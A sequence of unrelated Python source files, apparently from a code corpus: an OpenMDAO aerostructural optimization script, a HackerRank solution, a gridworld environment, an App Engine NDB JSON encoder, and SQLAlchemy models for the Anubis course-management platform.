dvs.add_output('lo_stringer', val=initial_thickness, shape = struct_comps['lo_stringer'])
self.add_subsystem('struct_mapper',StructDvMapper(), promotes=['*'])
# MELD setup
isym = 1
ldxfer_builder = MeldBuilder(aero_builder, struct_builder, isym=isym)
ldxfer_builder.initialize(self.comm)
for iscen, scenario in enumerate(['cruise','maneuver']):
nonlinear_solver = om.NonlinearBlockGS(maxiter=25, iprint=2, use_aitken=True, rtol = 1E-14, atol=1E-14)
linear_solver = om.LinearBlockGS(maxiter=25, iprint=2, use_aitken=True, rtol = 1e-14, atol=1e-14)
self.mphys_add_scenario(scenario,ScenarioAeroStructural(aero_builder=aero_builder,
struct_builder=struct_builder,
ldxfer_builder=ldxfer_builder),
nonlinear_solver, linear_solver)
for discipline in ['aero','struct']:
self.mphys_connect_scenario_coordinate_source('mesh_%s' % discipline, scenario, discipline)
for dv in ['q_inf','vel','nu','mach','dv_struct']:
self.connect(dv, f'{scenario}.{dv}')
self.connect('aoa', f'{scenario}.aoa', src_indices=[iscen])
self.add_subsystem('le_spar_smoothness',SmoothnessEvaluatorGrid(columns=struct_comps['le_spar'],rows=1))
self.add_subsystem('te_spar_smoothness',SmoothnessEvaluatorGrid(columns=struct_comps['te_spar'],rows=1))
self.add_subsystem('up_skin_smoothness',SmoothnessEvaluatorGrid(columns=9,rows=struct_comps['up_skin']//9))
self.add_subsystem('lo_skin_smoothness',SmoothnessEvaluatorGrid(columns=9,rows=int(struct_comps['lo_skin']/9)))
self.connect('le_spar','le_spar_smoothness.thickness')
self.connect('te_spar','te_spar_smoothness.thickness')
self.connect('up_skin','up_skin_smoothness.thickness')
self.connect('lo_skin','lo_skin_smoothness.thickness')
################################################################################
# OpenMDAO setup
################################################################################
prob = om.Problem()
prob.model = Top()
model = prob.model
# optimization set up
prob.model.add_design_var('aoa',lower=-5*np.pi/180, upper=10*np.pi/180.0, ref=1.0, units='rad')
prob.model.add_design_var('ribs', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('le_spar', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('te_spar', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('up_skin', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('lo_skin', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('up_stringer', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_design_var('lo_stringer', lower=0.001, upper=0.020, ref=0.005)
prob.model.add_objective('cruise.mass',ref=1000.0)
prob.model.add_constraint('cruise.C_L',ref=1.0,equals=0.5)
prob.model.add_constraint('maneuver.C_L',ref=1.0,equals=0.9)
prob.model.add_constraint('maneuver.ks_vmfailure',ref=1.0, upper = 2.0/3.0)
prob.model.add_constraint('le_spar_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('te_spar_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('up_skin_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
prob.model.add_constraint('lo_skin_smoothness.diff', ref=1e-3, upper = 0.0, linear=True)
#prob.driver = om.ScipyOptimizeDriver(debug_print=['ln_cons','nl_cons','objs','totals'])
prob.driver = om.ScipyOptimizeDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.driver.options['tol'] = 1e-8
prob.driver.options['disp'] = True
prob.driver.recording_options['includes'] = ['*']
prob.driver.recording_options['record_objectives'] = True
prob.driver.recording_options['record_constraints'] = True
prob.driver.recording_options['record_desvars'] = True
recorder = om.SqliteRecorder("cases.sql")
prob.driver.add_recorder(recorder)
prob.setup(mode='rev')
om.n2(prob, show_browser=False, outfile='mphys_as_vlm.html')
if check_derivs:
prob.run_model()
prob.check_totals(of=['cruise.mass','cruise.C_L','maneuver.ks_vmfailure'],
wrt=['aoa','ribs'])
else:
prob.run_driver()
cr = om.CaseReader('cases.sql')
driver_cases = cr.list_cases('driver')
matrix = np.zeros((len(driver_cases),4))
for i, case_id in enumerate(driver_cases):
matrix[i,0] = i
case = cr.get_case(case_id)
matrix[i,1] = case.get_objectives()['cruise.mass'][0]
matrix[i,2] = case.get_constraints()['cruise.C_L'][0]
matrix[i,3] = case.get_constraints()['maneuver.ks_vmfailure'][0]
np.savetxt('history.dat',matrix)
|
the-stack_0_1683 | # You wish to buy video games from the famous online video game store Mist.
# Usually, all games are sold at the same price, p dollars. However, they are planning to have the seasonal
# Halloween Sale next month in which you can buy games at a cheaper price. Specifically, the first game you
# buy during the sale will be sold at p dollars, but every subsequent game you buy will be sold at exactly d dollars less than the
# cost of the previous one you bought. This will continue until the cost becomes less than or equal to m dollars,
# after which every game you buy will cost m dollars each.
# For example, if p = 20, d = 3 and m = 6 then the following are the
# costs of the first games you buy, in order:
# 20, 17, 14, 11, 8, 6, 6, 6, 6, 6, 6
# You have s dollars in your Mist wallet.
# How many games can you buy during the Halloween Sale?
# Input Format
# The first and only line of input contains four space-separated integers
# p, d, m and s.
#!/bin/python3
import math
import os
import random
import re
import sys
# Complete the howManyGames function below.
def howManyGames(p, d, m, s):
# Return the number of games you can buy
l = []
n = p # Creating n from p (contains the remaining values)
if l == [] and p <= s:
l.append(p)
elif p > s:
return 0
n -= d
if (sum(l) + n) > s:
return len(l)
while n > m and (sum(l) + n) <= s:
l.append(n)
n -= d
while sum(l) + m <= s:
l.append(m)
n -= m
print(l)
return len(l)
if __name__ == "__main__":
fptr = open(os.environ["OUTPUT_PATH"], "w")
pdms = input().split()
p = int(pdms[0]) # Games sold at same price
d = int(pdms[1]) # d dollars less than previous one
m = int(pdms[2]) # less less than m
s = int(pdms[3])
answer = howManyGames(p, d, m, s)
fptr.write(str(answer) + "\n")
fptr.close()
# Output Format
# Print a single line containing a single integer denoting the maximum number of
# games you can buy.
# Sample Input 0
# 20 3 6 80
# Sample Output 0
# 6
# Explanation 0
# We have p = 20, d = 3 and m = 6, the same as in the problem statement.
# We also have dollars s = 80. We can buy 6 games since they cost 20 + 17 + 14 + 11 + 8 + 6 = 76 dollars.
# However, we cannot buy a 7th game. Thus, the answer is 6.
# Sample Input 1
# 20 3 6 85
# Sample Output 1
# 7
# Explanation 1
# This is the same as the previous case, except this time we have s = 85
# dollars. This time, we can buy 7 games since they cost 20 + 17 + 14 + 11 + 8 + 6 + 6 = 82 dollars.
# However, we cannot buy an 8th game. Thus, the answer is 7.
|
the-stack_0_1684 | import numpy as np
import random
import itertools
import scipy.misc
from PIL import Image
import matplotlib.pyplot as plt
class gameOb():
def __init__(self,coordinates,size,intensity,channel,reward,name):
self.x = coordinates[0]
self.y = coordinates[1]
self.size = size
self.intensity = intensity
self.channel = channel
self.reward = reward
self.name = name
class gameEnv():
def __init__(self,partial,size):
self.sizeX = size
self.sizeY = size
self.actions = 4
self.objects = []
self.partial = partial
a = self.reset()
plt.imshow(a,interpolation="nearest")
plt.axis("off")
def reset(self):
self.objects = []
hero = gameOb(self.newPosition(),1,1,2,None,'hero')
self.objects.append(hero)
bug = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug)
hole = gameOb(self.newPosition(),1,1,0,-1,'fire')
self.objects.append(hole)
bug2 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug2)
hole2 = gameOb(self.newPosition(),1,1,0,-1,'fire')
self.objects.append(hole2)
bug3 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug3)
bug4 = gameOb(self.newPosition(),1,1,1,1,'goal')
self.objects.append(bug4)
state = self.renderEnv()
self.state = state
return state
def moveChar(self,direction):
# 0 - up, 1 - down, 2 - left, 3 - right
hero = self.objects[0]
heroX = hero.x
heroY = hero.y
penalize = 0.
if direction == 0 and hero.y >= 1:
hero.y -= 1
if direction == 1 and hero.y <= self.sizeY-2:
hero.y += 1
if direction == 2 and hero.x >= 1:
hero.x -= 1
if direction == 3 and hero.x <= self.sizeX-2:
hero.x += 1
if hero.x == heroX and hero.y == heroY:
penalize = 0.0
self.objects[0] = hero
return penalize
def newPosition(self):
iterables = [ range(self.sizeX), range(self.sizeY)]
points = []
for t in itertools.product(*iterables):
points.append(t)
currentPositions = []
for objectA in self.objects:
if (objectA.x,objectA.y) not in currentPositions:
currentPositions.append((objectA.x,objectA.y))
for pos in currentPositions:
points.remove(pos)
location = np.random.choice(range(len(points)),replace=False)
return points[location]
def checkGoal(self):
others = []
for obj in self.objects:
if obj.name == 'hero':
hero = obj
else:
others.append(obj)
ended = False
for other in others:
if hero.x == other.x and hero.y == other.y:
self.objects.remove(other)
if other.reward == 1:
self.objects.append(gameOb(self.newPosition(),1,1,1,1,'goal'))
else:
self.objects.append(gameOb(self.newPosition(),1,1,0,-1,'fire'))
return other.reward,False
if ended == False:
return 0.0,False
def renderEnv(self):
#a = np.zeros([self.sizeY,self.sizeX,3])
a = np.ones([self.sizeY+2,self.sizeX+2,3])
a[1:-1,1:-1,:] = 0
hero = None
for item in self.objects:
a[item.y+1:item.y+item.size+1,item.x+1:item.x+item.size+1,item.channel] = item.intensity
if item.name == 'hero':
hero = item
if self.partial == True:
a = a[hero.y:hero.y+3,hero.x:hero.x+3,:]
b = Image.fromarray(np.uint8(a[:,:,0]*255), mode="L").resize((84,84), resample=Image.NEAREST)
c = Image.fromarray(np.uint8(a[:,:,1]*255), mode="L").resize((84,84), resample=Image.NEAREST)
d = Image.fromarray(np.uint8(a[:,:,2]*255), mode="L").resize((84,84), resample=Image.NEAREST)
a = np.stack([b,c,d],axis=2)
return a
def step(self,action):
penalty = self.moveChar(action)
reward,done = self.checkGoal()
state = self.renderEnv()
if reward == None:
print(done)
print(reward)
print(penalty)
return state,(reward+penalty),done
else:
return state,(reward+penalty),done |
the-stack_0_1686 | # -*- coding: utf-8 -*-
"""
JSON encoder/decoder adapted for use with Google App Engine NDB.
Usage:
import ndb_json
# Serialize an ndb.Query into an array of JSON objects.
query = models.MyModel.query()
query_json = ndb_json.dumps(query)
# Convert into a list of Python dictionaries.
query_dicts = ndb_json.loads(query_json)
# Serialize an ndb.Model instance into a JSON object.
entity = query.get()
entity_json = ndb_json.dumps(entity)
# Convert into a Python dictionary.
entity_dict = ndb_json.loads(entity_json)
Dependencies:
- dateutil: https://pypi.python.org/pypi/python-dateutil
"""
__author__ = 'Eric Higgins'
__copyright__ = 'Copyright 2013-2016, Eric Higgins'
__email__ = '[email protected]'
import base64
import datetime
import json
import time
import types
import dateutil.parser
from google.appengine.ext import ndb
__all__ = (
'dump',
'dumps',
'loads',
'NdbDecoder',
'NdbEncoder',
)
def encode_model(obj):
"""Encode objects like ndb.Model which have a `.to_dict()` method."""
obj_dict = obj.to_dict()
for key, val in obj_dict.iteritems():
if isinstance(val, types.StringType):
try:
unicode(val)
except UnicodeDecodeError:
# Encode binary strings (blobs) to base64.
obj_dict[key] = base64.b64encode(val)
return obj_dict
def encode_generator(obj):
"""Encode generator-like objects, such as ndb.Query."""
return list(obj)
def encode_key_as_entity(obj):
"""Get the Entity from the ndb.Key for further encoding."""
# NOTE(erichiggins): Potentially poor performance for Models w/ many KeyProperty properties.
# NOTE(ronufryk): Potentially can cause circular references and "RuntimeError: maximum recursion depth exceeded"
return obj.get_async()
# Alias for backward-compatibility
encode_key = encode_key_as_entity
def encode_key_as_pair(obj):
"""Get the ndb.Key as a tuple of (kind, id) pairs."""
return obj.pairs()
def encode_key_as_urlsafe(obj):
"""Get the ndb.Key as URL-safe base64-encoded string."""
return obj.urlsafe()
def encode_future(obj):
"""Encode an ndb.Future instance."""
return obj.get_result()
def encode_datetime(obj):
"""Encode a datetime.datetime or datetime.date object as an ISO 8601 format string."""
# Reformat the date slightly for better JS compatibility.
# Offset-naive dates need 'Z' appended for JS.
# datetime.date objects don't have or need tzinfo, so don't append 'Z'.
zone = '' if getattr(obj, 'tzinfo', True) else 'Z'
return obj.isoformat() + zone
def encode_complex(obj):
"""Convert a complex number object into a list containing the real and imaginary values."""
return [obj.real, obj.imag]
def encode_basevalue(obj):
"""Retrieve the actual value from a ndb.model._BaseValue.
This is a convenience function to assist with the following issue:
https://code.google.com/p/appengine-ndb-experiment/issues/detail?id=208
"""
return obj.b_val
NDB_TYPE_ENCODING = {
ndb.MetaModel: encode_model,
ndb.Query: encode_generator,
ndb.QueryIterator: encode_generator,
ndb.Key: encode_key_as_entity,
ndb.Future: encode_future,
datetime.date: encode_datetime,
datetime.datetime: encode_datetime,
time.struct_time: encode_generator,
types.ComplexType: encode_complex,
ndb.model._BaseValue: encode_basevalue,
}
# Sort the types so any iteration is in a deterministic order
NDB_TYPES = sorted(NDB_TYPE_ENCODING.keys(), key=lambda t: t.__name__)
class NdbDecoder(json.JSONDecoder):
"""Extend the JSON decoder to add support for datetime objects."""
def __init__(self, **kwargs):
"""Override the default __init__ in order to specify our own parameters."""
json.JSONDecoder.__init__(self, object_hook=self.object_hook_handler, **kwargs)
def object_hook_handler(self, val):
"""Handles decoding of nested date strings."""
return {k: self.decode_date(v) for k, v in val.iteritems()}
def decode_date(self, val):
"""Tries to decode strings that look like dates into datetime objects."""
if isinstance(val, basestring) and val.count('-') == 2 and len(val) > 9:
try:
dt = dateutil.parser.parse(val)
# Check for UTC.
if val.endswith(('+00:00', '-00:00', 'Z')):
# Then remove tzinfo for gae, which is offset-naive.
dt = dt.replace(tzinfo=None)
return dt
except (TypeError, ValueError):
pass
return val
def decode(self, val):
"""Override of the default decode method that also uses decode_date."""
# First try the date decoder.
new_val = self.decode_date(val)
if val != new_val:
return new_val
# Fall back to the default decoder.
return json.JSONDecoder.decode(self, val)
class NdbEncoder(json.JSONEncoder):
"""Extend the JSON encoder to add support for NDB Models."""
def __init__(self, **kwargs):
self._ndb_type_encoding = NDB_TYPE_ENCODING.copy()
keys_as_entities = kwargs.pop('ndb_keys_as_entities', False)
keys_as_pairs = kwargs.pop('ndb_keys_as_pairs', False)
keys_as_urlsafe = kwargs.pop('ndb_keys_as_urlsafe', False)
# Validate that only one of three flags is True
if ((keys_as_entities and keys_as_pairs)
or (keys_as_entities and keys_as_urlsafe)
or (keys_as_pairs and keys_as_urlsafe)):
raise ValueError('Only one of arguments ndb_keys_as_entities, ndb_keys_as_pairs, ndb_keys_as_urlsafe can be True')
if keys_as_pairs:
self._ndb_type_encoding[ndb.Key] = encode_key_as_pair
elif keys_as_urlsafe:
self._ndb_type_encoding[ndb.Key] = encode_key_as_urlsafe
else:
self._ndb_type_encoding[ndb.Key] = encode_key_as_entity
json.JSONEncoder.__init__(self, **kwargs)
def default(self, obj):
"""Overriding the default JSONEncoder.default for NDB support."""
obj_type = type(obj)
# NDB Models return a repr to calls from type().
if obj_type not in self._ndb_type_encoding:
if hasattr(obj, '__metaclass__'):
obj_type = obj.__metaclass__
else:
# Try to encode subclasses of types
for ndb_type in NDB_TYPES:
if isinstance(obj, ndb_type):
obj_type = ndb_type
break
fn = self._ndb_type_encoding.get(obj_type)
if fn:
return fn(obj)
return json.JSONEncoder.default(self, obj)
def dumps(ndb_model, **kwargs):
"""Custom json dumps using the custom encoder above."""
return NdbEncoder(**kwargs).encode(ndb_model)
def dump(ndb_model, fp, **kwargs):
"""Custom json dump using the custom encoder above."""
for chunk in NdbEncoder(**kwargs).iterencode(ndb_model):
fp.write(chunk)
def loads(json_str, **kwargs):
"""Custom json loads function that converts datetime strings."""
return NdbDecoder(**kwargs).decode(json_str)
|
the-stack_0_1689 | import base64
import copy
import os
from datetime import datetime, timedelta
from flask_sqlalchemy import SQLAlchemy
from sqlalchemy.orm import deferred
from sqlalchemy_json import MutableJson
from anubis.utils.data import rand
db = SQLAlchemy()
THEIA_DEFAULT_OPTIONS = {
"autosave": True,
"persistent_storage": False,
"network_policy": "os-student",
"resources": {
"requests": {"cpu": "300m", "memory": "300Mi"},
"limits": {"cpu": "2", "memory": "500Mi"},
},
}
def default_id(max_len=None) -> db.Column:
return db.Column(
db.String(128), primary_key=True, default=lambda: rand(max_len or 32)
)
class Config(db.Model):
__tablename__ = "anubis_config"
# Fields
key = db.Column(db.String(128), primary_key=True)
value = db.Column(db.String(2048))
@property
def data(self):
return {
"key": self.key,
"value": self.value,
}
class User(db.Model):
__tablename__ = "user"
# id
id = default_id()
# Fields
netid = db.Column(db.String(128), primary_key=True, unique=True, index=True)
github_username = db.Column(db.TEXT, index=True)
name = db.Column(db.TEXT)
is_superuser = db.Column(db.Boolean, nullable=False, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
ta_for_course = db.relationship(
"TAForCourse", cascade="all,delete", backref="owner"
)
professor_for_course = db.relationship(
"ProfessorForCourse", cascade="all,delete", backref="owner"
)
in_course = db.relationship("InCourse", cascade="all,delete", backref="owner")
assignment_repos = db.relationship(
"AssignmentRepo", cascade="all,delete", backref="owner"
)
assigned_student_questions = db.relationship(
"AssignedStudentQuestion", cascade="all,delete", backref="owner"
)
submissions = db.relationship("Submission", cascade="all,delete", backref="owner")
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="owner"
)
late_exceptions = db.relationship(
"LateException", cascade="all,delete", backref="user"
)
@property
def data(self):
from anubis.lms.courses import get_user_permissions
return {
"id": self.id,
"netid": self.netid,
"github_username": self.github_username,
"name": self.name,
**get_user_permissions(self),
}
def __repr__(self):
return self.__str__()
def __str__(self):
return f"<User {self.netid} {self.github_username}>"
class Course(db.Model):
__tablename__ = "course"
# id
id = default_id()
# Fields
name = db.Column(db.TEXT, nullable=False)
course_code = db.Column(db.TEXT, nullable=False)
semester = db.Column(db.TEXT, nullable=True)
section = db.Column(db.TEXT, nullable=True)
professor_display_name = db.Column(db.TEXT)
autograde_tests_repo = db.Column(
db.TEXT,
nullable=False,
default="https://github.com/os3224/anubis-assignment-tests",
)
github_repo_required = db.Column(db.Boolean, default=True)
theia_default_image = db.Column(
db.TEXT, nullable=False, default="registry.digitalocean.com/anubis/theia-xv6"
)
theia_default_options = db.Column(
MutableJson, default=lambda: copy.deepcopy(THEIA_DEFAULT_OPTIONS)
)
github_org = db.Column(db.TEXT, default="os3224")
join_code = db.Column(db.String(256), unique=True)
display_visuals = db.Column(db.Boolean, default=True)
assignments = db.relationship("Assignment", cascade="all,delete", backref="course")
ta_for_course = db.relationship(
"TAForCourse", cascade="all,delete", backref="course"
)
professor_for_course = db.relationship(
"ProfessorForCourse", cascade="all,delete", backref="course"
)
in_course = db.relationship("InCourse", cascade="all,delete", backref="course")
lecture_notes = db.relationship(
"LectureNotes", cascade="all,delete", backref="course"
)
static_files = db.relationship("StaticFile", cascade="all,delete", backref="course")
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="course"
)
@property
def total_assignments(self):
return self.open_assignments
@property
def open_assignments(self):
now = datetime.now()
return Assignment.query.filter(
Assignment.course_id == self.id,
Assignment.release_date <= now,
Assignment.hidden == False,
).count()
@property
def data(self):
return {
"id": self.id,
"name": self.name,
"course_code": self.course_code,
"section": self.section,
"professor_display_name": self.professor_display_name,
"total_assignments": self.total_assignments,
"open_assignment": self.open_assignments,
"join_code": self.id[:6],
}
class TAForCourse(db.Model):
__tablename__ = "ta_for_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
@property
def data(self):
return {
"id": self.course.id,
"name": self.course.name,
}
class ProfessorForCourse(db.Model):
__tablename__ = "professor_for_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
@property
def data(self):
return {
"id": self.course.id,
"name": self.course.name,
}
class InCourse(db.Model):
__tablename__ = "in_course"
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), primary_key=True)
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), primary_key=True)
class Assignment(db.Model):
__tablename__ = "assignment"
# id
id = default_id()
# Foreign Keys
course_id = db.Column(db.String(128), db.ForeignKey(Course.id), index=True)
# Fields
name = db.Column(db.TEXT, nullable=False, index=True)
hidden = db.Column(db.Boolean, default=False)
description = db.Column(db.TEXT, nullable=True)
unique_code = db.Column(
db.String(8),
unique=True,
default=lambda: base64.b16encode(os.urandom(4)).decode().lower(),
)
accept_late = db.Column(db.Boolean, default=True)
hide_due_date = db.Column(db.Boolean, default=False)
questions_assigned = db.Column(db.Boolean, default=False)
# Autograde
pipeline_image = db.Column(db.TEXT, nullable=True, index=True)
autograde_enabled = db.Column(db.Boolean, default=True)
# IDE
ide_enabled = db.Column(db.Boolean, default=True)
theia_image = db.Column(
db.TEXT, default="registry.digitalocean.com/anubis/theia-xv6"
)
theia_options = db.Column(
MutableJson, default=lambda: copy.deepcopy(THEIA_DEFAULT_OPTIONS)
)
# Github
github_template = db.Column(db.TEXT, nullable=True, default="")
github_repo_required = db.Column(db.Boolean, default=False)
# Dates
release_date = db.Column(db.DateTime, nullable=False)
due_date = db.Column(db.DateTime, nullable=False)
grace_date = db.Column(db.DateTime, nullable=True)
assignment_questions = db.relationship(
"AssignmentQuestion", cascade="all,delete", backref="assignment"
)
assigned_student_questions = db.relationship(
"AssignedStudentQuestion", cascade="all,delete", backref="assignment"
)
submissions = db.relationship(
"Submission", cascade="all,delete", backref="assignment"
)
theia_sessions = db.relationship(
"TheiaSession", cascade="all,delete", backref="assignment"
)
late_exceptions = db.relationship(
"LateException", cascade="all,delete", backref="assignment"
)
tests = db.relationship(
"AssignmentTest", cascade="all,delete", backref="assignment"
)
repos = db.relationship(
"AssignmentRepo", cascade="all,delete", backref="assignment"
)
@property
def data(self):
return {
"id": self.id,
"name": self.name,
"due_date": str(self.due_date),
"past_due": self.due_date < datetime.now(),
"hidden": self.hidden,
"accept_late": self.accept_late,
"autograde_enabled": self.autograde_enabled,
"hide_due_date": self.hide_due_date,
"course": self.course.data,
"description": self.description,
"visible_to_students": not self.hidden
and (datetime.now() > self.release_date),
"ide_active": self.due_date + timedelta(days=3 * 7) > datetime.now(),
"tests": [t.data for t in self.tests if t.hidden is False],
# IDE
"ide_enabled": self.ide_enabled,
"autosave": self.theia_options.get("autosave", True),
"persistent_storage": self.theia_options.get("persistent_storage", False),
# Github
"github_repo_required": self.github_repo_required,
}
@property
def full_data(self):
data = self.data
data["tests"] = [t.data for t in self.tests]
return data
class AssignmentRepo(db.Model):
__tablename__ = "assignment_repo"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id), nullable=True)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), nullable=False
)
# Fields
github_username = db.Column(db.TEXT, nullable=False)
repo_url = db.Column(db.String(512), nullable=False)
# State booleans
repo_created = db.Column(db.Boolean, default=False)
collaborator_configured = db.Column(db.Boolean, default=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
return {
"id": self.id,
"github_username": self.github_username,
"assignment_id": self.assignment_id,
"assignment_name": self.assignment.name,
"ready": self.repo_created and self.collaborator_configured,
"course_code": self.assignment.course.course_code,
"repo_url": self.repo_url,
}
class AssignmentTest(db.Model):
__tablename__ = "assignment_test"
# id
id = default_id()
# Foreign Keys
assignment_id = db.Column(db.String(128), db.ForeignKey(Assignment.id))
# Fields
name = db.Column(db.TEXT, index=True)
hidden = db.Column(db.Boolean, default=False)
@property
def data(self):
return {"id": self.id, "name": self.name, "hidden": self.hidden}
class AssignmentQuestion(db.Model):
__tablename__ = "assignment_question"
# id
id = default_id()
# Foreign Keys
assignment_id = db.Column(db.String(128), db.ForeignKey(Assignment.id), index=True)
# Fields
question = db.Column(db.Text, nullable=False)
solution = db.Column(db.Text, nullable=True)
pool = db.Column(db.Integer, index=True, nullable=False)
code_question = db.Column(db.Boolean, default=False)
code_language = db.Column(db.TEXT, nullable=True, default="")
placeholder = db.Column(db.Text, nullable=True, default="")
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
shape = {"question": str, "solution": str, "pool": int}
@property
def full_data(self):
return {
"id": self.id,
"question": self.question,
"code_question": self.code_question,
"code_language": self.code_language,
"solution": self.solution,
"pool": self.pool,
}
@property
def data(self):
return {
"id": self.id,
"question": self.question,
"code_question": self.code_question,
"code_language": self.code_language,
"pool": self.pool,
}
class AssignedStudentQuestion(db.Model):
__tablename__ = "assigned_student_question"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(db.String(128), db.ForeignKey(User.id))
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), index=True, nullable=False
)
question_id = db.Column(
db.String(128), db.ForeignKey(AssignmentQuestion.id), index=True, nullable=False
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Relationships
question = db.relationship(AssignmentQuestion)
responses = db.relationship(
"AssignedQuestionResponse", cascade="all,delete", backref="question"
)
@property
def data(self):
"""
Returns simple dictionary representation of the object.
:return:
"""
response: AssignedQuestionResponse = (
AssignedQuestionResponse.query.filter(
AssignedQuestionResponse.assigned_question_id == self.id,
)
.order_by(AssignedQuestionResponse.created.desc())
.first()
)
response_data = {
"submitted": None,
"late": True,
"text": self.question.placeholder,
}
if response is not None:
response_data = response.data
return {
"id": self.id,
"response": response_data,
"question": self.question.data,
}
@property
def full_data(self):
data = self.data
data["question"] = self.question.full_data
return data
class AssignedQuestionResponse(db.Model):
__tablename__ = "assigned_student_response"
# id
id = default_id()
# Foreign Keys
assigned_question_id = db.Column(
db.String(128),
db.ForeignKey(AssignedStudentQuestion.id),
index=True,
nullable=False,
)
# Fields
response = db.Column(db.TEXT, default="", nullable=False)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
@property
def data(self):
from anubis.lms.assignments import get_assignment_due_date
return {
"submitted": str(self.created),
"late": get_assignment_due_date(
self.question.owner.id, self.question.assignment.id
)
< self.created,
"text": self.response,
}
class Submission(db.Model):
__tablename__ = "submission"
# id
id = default_id()
# Foreign Keys
owner_id = db.Column(
db.String(128), db.ForeignKey(User.id), index=True, nullable=True
)
assignment_id = db.Column(
db.String(128), db.ForeignKey(Assignment.id), index=True, nullable=False
)
assignment_repo_id = db.Column(
db.String(128), db.ForeignKey(AssignmentRepo.id), nullable=False
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Fields
commit = db.Column(db.String(128), unique=True, index=True, nullable=False)
processed = db.Column(db.Boolean, default=False)
state = db.Column(db.TEXT, default="")
errors = db.Column(MutableJson, default=None, nullable=True)
token = db.Column(
db.String(64), default=lambda: base64.b16encode(os.urandom(32)).decode()
)
accepted = db.Column(db.Boolean, default=True)
# Relationships
build = db.relationship(
"SubmissionBuild",
cascade="all,delete",
uselist=False,
backref="submission",
lazy=False,
)
test_results = db.relationship(
"SubmissionTestResult", cascade="all,delete", backref="submission", lazy=False
)
repo = db.relationship(AssignmentRepo, backref="submissions")
@property
def visible_tests(self):
"""
Get a list of dictionaries of the matching Test, and TestResult
for the current submission.
:return:
"""
# Query for matching AssignmentTests, and TestResults
tests = (
SubmissionTestResult.query.join(AssignmentTest)
.filter(
SubmissionTestResult.submission_id == self.id,
AssignmentTest.hidden == False,
)
.all()
)
# Convert to dictionary data
return [
{"test": result.assignment_test.data, "result": result.data}
for result in tests
]
@property
def all_tests(self):
"""
Get a list of dictionaries of the matching Test, and TestResult
for the current submission.
:return:
"""
# Query for matching AssignmentTests, and TestResults
tests = (
SubmissionTestResult.query.join(AssignmentTest)
.filter(
SubmissionTestResult.submission_id == self.id,
)
.all()
)
# Convert to dictionary data
return [
{"test": result.assignment_test.data, "result": result.data}
for result in tests
]
@property
def data(self):
return {
"id": self.id,
"assignment_name": self.assignment.name,
"assignment_due": str(self.assignment.due_date),
"course_code": self.assignment.course.course_code,
"commit": self.commit,
"processed": self.processed,
"state": self.state,
"created": str(self.created),
"last_updated": str(self.last_updated),
"error": self.errors is not None,
}
@property
def full_data(self):
data = self.data
# Add connected models
data["repo"] = self.repo.repo_url
data["tests"] = self.visible_tests
data["build"] = self.build.data if self.build is not None else None
return data
@property
def admin_data(self):
data = self.data
# Add connected models
data["repo"] = self.repo.repo_url
data["tests"] = self.all_tests
data["build"] = self.build.data if self.build is not None else None
return data
class SubmissionTestResult(db.Model):
__tablename__ = "submission_test_result"
# id
id = default_id()
# Foreign Keys
submission_id = db.Column(
db.String(128), db.ForeignKey(Submission.id), primary_key=True
)
assignment_test_id = db.Column(
db.String(128), db.ForeignKey(AssignmentTest.id), primary_key=True
)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
last_updated = db.Column(db.DateTime, default=datetime.now, onupdate=datetime.now)
# Fields
stdout = deferred(db.Column(db.Text))
message = deferred(db.Column(db.Text))
passed = db.Column(db.Boolean)
# Relationships
assignment_test = db.relationship(AssignmentTest)
@property
def data(self):
return {
"id": self.id,
"test_name": self.assignment_test.name,
"passed": self.passed,
"message": self.message,
"stdout": self.stdout,
"created": str(self.created),
"last_updated": str(self.last_updated),
}
@property
def stat_data(self):
data = self.data
del data["stdout"]
return data
def __str__(self):
return "testname: {}\nerrors: {}\npassed: {}\n".format(
self.testname,
self.errors,
self.passed,
)
class SubmissionBuild(db.Model):
__tablename__ = "submission_build"
# id
id = default_id()
# Foreign Keys
submission_id = db.Column(db.String(128), db.ForeignKey(Submission.id), index=True)
# Fields
stdout = deferred(db.Column(db.Text))
passed = db.Column(db.Boolean, default=None)
# Timestamps
created = db.Column(db.DateTime, default=datetime.now)
